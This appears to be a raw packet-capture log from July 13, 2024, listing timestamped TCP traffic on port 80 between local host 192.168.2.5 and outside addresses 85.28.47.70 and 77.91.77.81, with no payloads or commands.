                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.748883963 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.748939037 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750307083 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750334024 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750350952 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750377893 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750377893 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750399113 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750457048 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750473022 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750488997 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750513077 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750536919 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750536919 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750602007 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750617027 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750632048 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750642061 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750649929 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750669956 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750669956 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750695944 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750767946 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.750819921 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.773190022 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.773232937 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.773289919 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.773329020 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.773363113 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.773380041 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.773380041 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.773380041 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.773380041 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.773397923 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.773432016 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.773447990 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.773447990 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.773469925 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.773483038 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.773622036 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789391994 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789469004 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789479971 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789515972 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789535046 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789552927 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789566994 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789587021 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789606094 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789621115 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789630890 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789669991 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789674997 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789715052 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789733887 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789755106 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789772987 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789791107 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789841890 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789846897 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789877892 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789896011 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789912939 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789927006 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789952040 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.789957047 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.790000916 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.825819016 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.825840950 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.825859070 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826013088 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826013088 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826148987 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826180935 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826205969 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826220989 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826221943 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826221943 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826236963 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826242924 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826252937 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826267958 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826277018 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826277018 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826282978 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826303005 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826313972 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826313972 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826318979 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826335907 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826342106 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826342106 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826350927 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826369047 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826376915 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826376915 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826390982 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826436043 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826452017 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826467037 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826467037 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826503992 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826503992 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826545000 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826560974 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826611042 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826870918 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826914072 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826931000 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826946020 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826961994 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826971054 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826971054 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826977968 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826994896 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.826997042 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827011108 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827014923 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827028036 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827033043 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827047110 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827053070 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827053070 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827064991 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827073097 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827091932 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827131987 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827132940 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827150106 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827183008 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827198982 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827214003 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827228069 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827228069 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827229023 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827248096 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827255011 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827255011 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827275038 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827295065 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827471972 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827497959 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827513933 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827528954 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827543974 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827549934 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827584982 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827584982 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827831030 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827847004 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827862978 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827878952 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827879906 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827893972 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827908039 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827908039 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827912092 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827928066 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827929020 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827945948 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827954054 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827955008 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827965021 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827979088 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827982903 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.827994108 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828011036 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828028917 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828249931 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828265905 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828279972 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828295946 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828310966 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828318119 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828325987 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828340054 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828342915 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828360081 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828360081 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828377008 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828377008 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828392982 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828397989 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828419924 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828437090 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828628063 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828644037 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828658104 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828681946 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828685045 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828685045 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828700066 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828706980 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828716993 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828735113 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828738928 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828756094 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828758955 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828758955 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828773022 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828778982 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828789949 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828804016 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.828824043 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829175949 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829191923 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829206944 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829221964 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829222918 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829221964 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829240084 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829247952 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829248905 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829256058 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829267979 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829272985 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829289913 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829296112 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829296112 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829315901 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829334974 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829509974 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829525948 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829544067 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829560041 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829571009 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829571009 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829605103 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829605103 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829657078 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829683065 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829698086 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829714060 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829729080 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829730034 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829745054 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829749107 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829761982 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829773903 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829773903 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829778910 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829794884 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829794884 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829813004 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829819918 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829819918 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829828978 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829839945 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829847097 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829859972 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829864025 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829880953 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829886913 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829886913 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829896927 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829906940 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829922915 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.829952955 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830578089 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830593109 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830607891 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830622911 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830636024 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830636024 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830638885 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830655098 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830657005 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830672026 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830682993 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830682993 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830702066 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.830709934 CEST805898185.28.47.70192.168.2.5
